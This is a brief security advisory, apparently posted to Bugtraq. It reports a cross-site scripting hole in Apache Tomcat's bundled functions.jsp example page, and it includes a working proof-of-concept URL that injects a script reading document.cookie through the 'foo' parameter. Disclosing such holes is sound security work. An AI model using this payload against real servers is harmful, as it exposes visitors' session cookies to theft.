<span class="ppt" id="_user_bugtraq@securityfocus.com">Apache Tomcat remote xss<br>Author: handrix<br>Contact: handrix_at_morx_dot_org<br>Vulnerability: Cross Site Scripting <br>Severity: Medium/High<br>MorX security research team
<br><a href="http://www.morx.org">www.morx.org</a><br><br>Description:<br>Tomcat provide many example of jsp file, servlet and others.<br>functions.jsp script is vulnerable to cross-site scripting attacks in foo parameter.
<br><br><br><br>XSS Vector:<br><a href="http://server:port/jsp-examples/jsp2/el/functions.jsp?foo=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E">http://server:port/jsp-examples/jsp2/el/functions.jsp?foo=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
</a><br><br><br>Vulnerable versions :<br>Apache Tomecat/5.2.28 and may be others <br></span>